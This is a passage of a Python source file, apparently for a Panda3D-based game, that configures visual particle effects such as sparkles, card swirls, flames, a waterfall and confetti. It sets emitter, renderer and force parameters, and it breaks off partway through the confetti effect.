    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: small sprites that shrink to nothing
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
    part.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    part.renderer.setXScaleFlag(0)
    part.renderer.setYScaleFlag(0)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.04)
    part.renderer.setFinalXScale(0.000)
    part.renderer.setInitialYScale(0.04)
    part.renderer.setFinalYScale(0.000)
    part.renderer.setNonanimatedTheta(0.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    part.renderer.setAlphaDisable(0)
    # Emitter: negative amplitude pulls particles toward the center
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(-1.0000)
    part.emitter.setAmplitudeSpread(0.0000)
    part.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    part.emitter.setRadius(1.0000)
    self.addParticles(part)
@particle
def demotionSpray(self):
    """Forward spray of shrinking 'roll-o-dex' sprites; no force group."""
    self.reset()
    self.setPos(0.000, 4.000, 3.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    part = Particles.Particles('particles-1')
    # System-level configuration
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("SphereVolumeEmitter")
    part.setPoolSize(150)
    part.setBirthRate(0.0500)
    part.setLitterSize(7)
    part.setLitterSpread(0)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: particle lifetime / mass
    part.factory.setLifespanBase(0.8000)
    part.factory.setLifespanSpread(0.0000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: sprites shrink from 0.04 to 0.009
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
    part.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    part.renderer.setXScaleFlag(0)
    part.renderer.setYScaleFlag(0)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.04)
    part.renderer.setFinalXScale(0.009)
    part.renderer.setInitialYScale(0.04)
    part.renderer.setFinalYScale(0.009)
    part.renderer.setNonanimatedTheta(0.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    part.renderer.setAlphaDisable(0)
    # Emitter: radiate forward out of a sphere volume
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(3.0000)
    part.emitter.setAmplitudeSpread(0.0000)
    part.emitter.setOffsetForce(Vec3(0.0000, 6.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
    part.emitter.setRadius(0.8900)
    self.addParticles(part)
@particle
def powertrip2(self):
    """Green sparkle stream pulled sideways by a sink force, with drift and jitter."""
    self.reset()
    self.setPos(-2.000, 2.500, 2.200)
    self.setHpr(-90.000, 0.000, 0.000)
    self.setScale(4.800, 4.800, 4.800)
    part = Particles.Particles('particles-1')
    # System-level configuration
    part.setFactory("PointParticleFactory")
    part.setRenderer("SparkleParticleRenderer")
    part.setEmitter("SphereVolumeEmitter")
    part.setPoolSize(100)
    part.setBirthRate(0.0800)
    part.setLitterSize(1)
    part.setLitterSpread(0)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: very short particle lifetime
    part.factory.setLifespanBase(0.2500)
    part.factory.setLifespanSpread(0.050)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: green-centered sparkles with dark edges
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setCenterColor(Vec4(0.1, 0.95, 0.2, 1.00))
    part.renderer.setEdgeColor(Vec4(0, 0, 0, 1.00))
    part.renderer.setBirthRadius(0.1000)
    part.renderer.setDeathRadius(15.0000)
    part.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter: radiate with spread from a small sphere volume
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(2.4000)
    part.emitter.setAmplitudeSpread(1.1000)
    part.emitter.setOffsetForce(Vec3(0.0000, 1.1000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
    part.emitter.setRadius(0.120)
    self.addParticles(part)
    fgroup = ForceGroup.ForceGroup('forces')
    # Sink off to the side pulls the stream laterally
    sink = LinearSinkForce(Point3(-10.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
    sink.setActive(1)
    fgroup.addForce(sink)
    # Zero-magnitude vector force (kept for parity with the original effect data)
    drift = LinearVectorForce(Vec3(0.0000, 0.0000, 0.0000), 1.0000, 0)
    drift.setActive(1)
    fgroup.addForce(drift)
    # Mild jitter
    jitter = LinearJitterForce(4.5449, 0)
    jitter.setActive(1)
    fgroup.addForce(jitter)
    self.addForceGroup(fgroup)
@particle
def rollodexVortex(self):
    """Swirl of 'rollodex-card' sprites: tangent-ring emission spun by a cylinder vortex."""
    self.reset()
    # Alternate orientation from the original data: (70.004, -75.422, 35.756)
    self.setPos(-0.003, 2.465, 3.714)
    self.setHpr(84.924, 13.378, 56.334)
    self.setScale(1.000, 1.000, 1.000)
    part = Particles.Particles('particles-1')
    # System-level configuration: finite 5 s system lifespan
    part.setFactory("PointParticleFactory")
    part.setRenderer("SpriteParticleRenderer")
    part.setEmitter("TangentRingEmitter")
    part.setPoolSize(250)
    part.setBirthRate(0.1000)
    part.setLitterSize(5)
    part.setLitterSpread(3)
    part.setSystemLifespan(5.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: short lifetime, low terminal velocity
    part.factory.setLifespanBase(0.5000)
    part.factory.setLifespanSpread(0.2500)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(40.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: fixed-size card sprites, no alpha fade
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setIgnoreScale(1)
    part.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/rollodex-card")
    part.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    part.renderer.setXScaleFlag(0)
    part.renderer.setYScaleFlag(0)
    part.renderer.setAnimAngleFlag(0)
    part.renderer.setInitialXScale(0.4)
    part.renderer.setFinalXScale(0.4)
    part.renderer.setInitialYScale(0.3)
    part.renderer.setFinalYScale(0.3)
    part.renderer.setNonanimatedTheta(0.0000)
    part.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    part.renderer.setAlphaDisable(0)
    # Emitter: tangent-ring launch (cards fly tangentially)
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(3.0000)
    part.emitter.setAmplitudeSpread(0.0000)
    part.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    part.emitter.setRadius(0.7500)
    self.addParticles(part)
    fgroup = ForceGroup.ForceGroup('forward')
    # Outward push from the center
    srcCenter = LinearSourceForce(Point3(0.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.0000, 1)
    srcCenter.setActive(1)
    fgroup.addForce(srcCenter)
    # Inactive sink (kept for parity with the original effect data)
    sink = LinearSinkForce(Point3(0.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 5.0000, 6.0000, 0)
    sink.setActive(0)
    fgroup.addForce(sink)
    # Vortex supplies the spin
    swirl = LinearCylinderVortexForce(1.0000, 1.0000, 15.0000, 1.0000, 0)
    swirl.setActive(1)
    fgroup.addForce(swirl)
    # Second, offset source force with cubic falloff
    srcOffset = LinearSourceForce(Point3(0.5000, 0.0000, 1.0000), LinearDistanceForce.FTONEOVERRCUBED, 4.0000, 4.0000, 1)
    srcOffset.setActive(1)
    fgroup.addForce(srcOffset)
    self.addForceGroup(fgroup)
@particle
def pixieExplode(self):
    """Explicit-launch sparkle burst (white core, blue edge) with light jitter."""
    self.reset()
    self.setPos(2.500, 0.000, 2.500)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(3.000)
    part = Particles.Particles('particles-1')
    # System-level configuration
    part.setFactory("PointParticleFactory")
    part.setRenderer("SparkleParticleRenderer")
    part.setEmitter("SphereVolumeEmitter")
    part.setPoolSize(100)
    part.setBirthRate(0.1000)
    part.setLitterSize(7)
    part.setLitterSpread(0)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: particle lifetime / mass
    part.factory.setLifespanBase(1.5000)
    part.factory.setLifespanSpread(0.2000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: sparkles fade out over their life
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
    part.renderer.setEdgeColor(Vec4(0.00, 0.00, 1.00, 1.00))
    part.renderer.setBirthRadius(0.0400)
    part.renderer.setDeathRadius(0.0000)
    part.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter: explicit launch vector rather than radiation
    part.emitter.setEmissionType(BaseParticleEmitter.ETEXPLICIT)
    part.emitter.setAmplitude(1.0000)
    part.emitter.setAmplitudeSpread(0.0100)
    part.emitter.setOffsetForce(Vec3(-0.1000, 0.0000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.5000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
    part.emitter.setRadius(0.1000)
    self.addParticles(part)
    fgroup = ForceGroup.ForceGroup('forces')
    # Gentle jitter scatters the burst
    jitter = LinearJitterForce(2.0000, 0)
    jitter.setActive(1)
    fgroup.addForce(jitter)
    self.addForceGroup(fgroup)
@particle
def guiltTrip(self):
    """Red sparkle stream (same placement as powertrip2) with strong jitter only."""
    self.reset()
    self.setPos(-2.000, 2.500, 2.200)
    self.setHpr(-90.000, 0.000, 0.000)
    self.setScale(4.800, 4.800, 4.800)
    part = Particles.Particles('particles-1')
    # System-level configuration
    part.setFactory("PointParticleFactory")
    part.setRenderer("SparkleParticleRenderer")
    part.setEmitter("SphereVolumeEmitter")
    part.setPoolSize(100)
    part.setBirthRate(0.0800)
    part.setLitterSize(1)
    part.setLitterSpread(0)
    part.setSystemLifespan(0.0000)
    part.setLocalVelocityFlag(1)
    part.setSystemGrowsOlderFlag(0)
    # Factory: short particle lifetime
    part.factory.setLifespanBase(0.4000)
    part.factory.setLifespanSpread(0.000)
    part.factory.setMassBase(1.0000)
    part.factory.setMassSpread(0.0000)
    part.factory.setTerminalVelocityBase(400.0000)
    part.factory.setTerminalVelocitySpread(0.0000)
    # Renderer: red-centered sparkles with pale translucent edges
    part.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    part.renderer.setUserAlpha(1.00)
    part.renderer.setCenterColor(Vec4(1.0, 0, 0, 0.9))
    part.renderer.setEdgeColor(Vec4(0.8, 0.8, 0.8, 0.4))
    part.renderer.setBirthRadius(0.1000)
    part.renderer.setDeathRadius(15.0000)
    part.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter: radiate with spread from a small sphere volume
    part.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    part.emitter.setAmplitude(2.4000)
    part.emitter.setAmplitudeSpread(1.1000)
    part.emitter.setOffsetForce(Vec3(0.0000, 1.1000, 0.0000))
    part.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    part.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
    part.emitter.setRadius(0.120)
    self.addParticles(part)
    fgroup = ForceGroup.ForceGroup('forces')
    # Heavy jitter gives the frantic look
    jitter = LinearJitterForce(14.5449, 0)
    jitter.setActive(1)
    fgroup.addForce(jitter)
    self.addForceGroup(fgroup)
@particle
def soundBreak(self):
    """Build the 'sound break' effect: a few z-spinning sprite shards
    (the **/break texture) stretched vertically over their lifetime.

    Uses a ZSpinParticleFactory with a random initial angle and a
    point emitter at the origin; no force group is attached.
    """
    self.reset()
    self.setPos(0.000, 0.000, 0.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("ZSpinParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("PointEmitter")
    p0.setPoolSize(7)
    p0.setBirthRate(0.0500)
    p0.setLitterSize(3)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.5000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Z Spin factory parameters
    # Random start angle anywhere in +/-180 degrees, no spin velocity.
    p0.factory.setInitialAngle(0.0000)
    p0.factory.setInitialAngleSpread(180.0000)
    p0.factory.enableAngularVelocity(1)
    p0.factory.setAngularVelocity(0.0000)
    p0.factory.setAngularVelocitySpread(0.0000)
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAINOUT)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setTextureFromNode("phase_5/models/props/uberSoundEffects", "**/break")
    #p0.renderer.addTextureFromFile('maps/break.tif')
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(1)
    # Y grows from 0 to 9 while X stays fixed: sprites stretch tall.
    p0.renderer.setInitialXScale(1.5000)
    p0.renderer.setFinalXScale(1.5000)
    p0.renderer.setInitialYScale(0.0000)
    p0.renderer.setFinalYScale(9.0000)
    p0.renderer.setNonanimatedTheta(319.3987)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(1.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Point parameters
    p0.emitter.setLocation(Point3(0.0000, 0.0000, 0.0000))
    self.addParticles(p0)
@particle
def pixiePoof(self):
    """Build the 'pixie poof' effect: a dense burst of small
    white-to-blue sparkles radiating from a sphere volume.

    Configures a single Particles object (point factory, sparkle
    renderer, sphere-volume emitter) and registers it via
    addParticles.  No forces act on this effect.
    """
    self.reset()
    self.setPos(0.000, 0.000, 3.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SparkleParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(200)
    p0.setBirthRate(0.0200)
    p0.setLitterSize(2)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.0000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
    p0.renderer.setUserAlpha(1.00)
    # Sparkle parameters
    # White core with a blue edge; sparkles grow slightly over life.
    p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setEdgeColor(Vec4(0.04, 0.04, 1.00, 1.00))
    p0.renderer.setBirthRadius(0.0272)
    p0.renderer.setDeathRadius(0.1872)
    p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(1.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.200)
    self.addParticles(p0)
    # NOTE(review): the original also built an empty
    # ForceGroup.ForceGroup('forces') here but never added any force
    # to it nor registered it with addForceGroup -- a dead local.
    # Removed; behavior is unchanged.
@particle
def waterfall(self):
    """Build the 'waterfall' effect: small green sparkles sprayed from
    a disc emitter and pulled down by a strong LinearSinkForce.
    """
    self.reset()
    self.setPos(0.000, 5.000, 2.300)
    self.setHpr(0.000, -45.000, 0.000)
    self.setScale(4.000, 4.000, 4.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SparkleParticleRenderer")
    p0.setEmitter("DiscEmitter")
    p0.setPoolSize(50)
    p0.setBirthRate(0.0500)
    p0.setLitterSize(4)
    p0.setLitterSpread(1)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    # Very short lifespan (0.1 +/- 0.1s) keeps the stream tight.
    p0.factory.setLifespanBase(0.1000)
    p0.factory.setLifespanSpread(0.1000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
    p0.renderer.setUserAlpha(1.00)
    # Sparkle parameters
    p0.renderer.setCenterColor(Vec4(0.1, 0.95, 0.2, 1.00))
    p0.renderer.setEdgeColor(Vec4(0.00, 0.00, 0.00, 1.00))
    p0.renderer.setBirthRadius(0.0200)
    p0.renderer.setDeathRadius(0.0600)
    p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(3.5000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
    # Disc parameters
    p0.emitter.setRadius(0.2000)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    # Sink below the emitter drags particles downward (1/r^2 falloff).
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -30.0000), LinearDistanceForce.FTONEOVERRSQUARED, 3.0400, 1.5000, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def headShrinkCloud(self):
    """Build the 'head shrink cloud' effect: golden sparkles emitted
    from a tiny sphere surface and scattered by a heavy jitter force.
    """
    self.reset()
    self.setPos(0.000, 0.000, 8.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SparkleParticleRenderer")
    p0.setEmitter("SphereSurfaceEmitter")
    p0.setPoolSize(60)
    p0.setBirthRate(0.100)
    p0.setLitterSize(5)
    p0.setLitterSpread(3)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.3000)
    p0.factory.setLifespanSpread(0.100)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sparkle parameters
    # Gold core, faint white edge; sparkles shrink to nothing.
    p0.renderer.setCenterColor(Vec4(1, 0.84, 0, 1.00))
    p0.renderer.setEdgeColor(Vec4(1, 1, 1, 0.3))
    p0.renderer.setBirthRadius(0.1500)
    p0.renderer.setDeathRadius(0.0000)
    p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(4.0000)
    p0.emitter.setAmplitudeSpread(2.5000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Sphere Surface parameters
    p0.emitter.setRadius(0.0200)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearJitterForce(33.2697, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def firedFlame(self):
    """Build the 'fired' flame column: fire sprites pushed upward by
    the emitter's offset force, shrinking to near-zero as they die.
    No force group is attached.
    """
    self.reset()
    self.setPos(0.000, 0.000, 0.500)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(2.500, 4.500, 2.500)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(60)
    p0.setBirthRate(0.0220)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.500)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/fire")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    # Flames start tall-ish and collapse to almost nothing.
    p0.renderer.setInitialXScale(0.15)
    p0.renderer.setFinalXScale(0.00025)
    p0.renderer.setInitialYScale(0.30)
    p0.renderer.setFinalYScale(0.00025)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(1.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    # Constant +Z offset force carries the flames upward.
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 4.800))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -30.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.4000)
    self.addParticles(p0)
@particle
def spinSpray(self):
    """Build the 'spin' spray: red-tinted snow-particle sprites sprayed
    from a sphere volume, curved by a sink force below the effect.
    """
    self.reset()
    self.setPos(0.000, 6.500, 3.200)
    self.setHpr(50.000, -0.000, -90.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(70)
    p0.setBirthRate(0.2000)
    p0.setLitterSize(9)
    p0.setLitterSpread(4)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.2000)
    p0.factory.setLifespanSpread(0.2000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
    # Snow texture tinted solid red.
    p0.renderer.setColor(Vec4(1.00, 0.00, 0.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.025)
    p0.renderer.setFinalXScale(0.05)
    p0.renderer.setInitialYScale(0.025)
    p0.renderer.setFinalYScale(0.05)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(6.0000)
    p0.emitter.setAmplitudeSpread(0.7000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.200)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -3.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
    force0.setActive(1)
    f0.addForce(force0)
    # NOTE(review): force1 has a zero vector, so it should contribute
    # nothing -- presumably a leftover tuning slot; confirm before
    # removing.
    force1 = LinearVectorForce(Vec3(0.0000, 0.0000, 0.0000), 1.0000, 0)
    force1.setActive(1)
    f0.addForce(force1)
    self.addForceGroup(f0)
@particle
def confetti(self):
    """Build the 'confetti' effect: many tiny spark sprites emitted
    from a small disc, jittered and pulled toward a sink point in a
    'gravity' force group.
    """
    self.reset()
    self.setPos(0.000, 0.000, 0.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("DiscEmitter")
    p0.setPoolSize(350)
    p0.setBirthRate(0.0200)
    p0.setLitterSize(5)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.7000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
